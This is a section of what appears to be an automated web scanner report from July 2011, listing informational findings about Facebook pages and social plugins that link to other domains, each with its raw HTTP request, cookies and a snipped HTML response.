Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/EX2d6_qWW-3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...

20.67. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.68. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.124.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 18096

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/mobile\/index.php";window._EagleEyeSeed="ynVf";</script><
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="promo_image"><img class="Facebook Mobile img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/8gX9xr8NfW0.png" alt="" width="453" height="134" /></div>
...[SNIP]...
<div class="navItem"><a href="http://www.microsoft.com/windowsphone" target="_blank" rel="nofollow" title="Windows Phone" onmousedown="UntrustedLink.bootstrap($(this), &quot;TAQDr3i_Q&quot;, event, bagof(null));">Windows Phone</a>
...[SNIP]...

20.69. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<h2 class="uiHeaderTitle"><img class="uiHeaderImage img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif" alt="" width="15" height="15" />Create a Page</h2>
...[SNIP]...

20.70. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.40
X-Cnection: close
Date: Tue, 19 Jul 2011 20:42:24 GMT
Content-Length: 8776

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="pbsH";</scri
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Lw9gkzA7aII.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/qhCGMtA-DY_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/NBp6zLvqcE_.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

20.71. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.25
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:22 GMT
Content-Length: 6328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/gn-vukSYjxu.css" />
<script>
...[SNIP]...

20.72. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/News.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.255.43
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:43 GMT
Content-Length: 10298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/fastteksRI" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg" alt="Fast-teks TechSolutions" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

20.73. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=105579996199059&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ed0912f1adcec%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=62&href=http%3A%2F%2Fwww.facebook.com%2Ffansnap&locale=en_US&sdk=joey&show_faces=false&stream=false&width=225 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.22.38
X-Cnection: close
Date: Tue, 19 Jul 2011 18:43:46 GMT
Content-Length: 7989

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/NBp6zLvqcE_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/qhCGMtA-DY_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/Lw9gkzA7aII.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/fansnap" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50196_55311985224_3062_q.jpg" alt="FanSnap" /></a>
...[SNIP]...

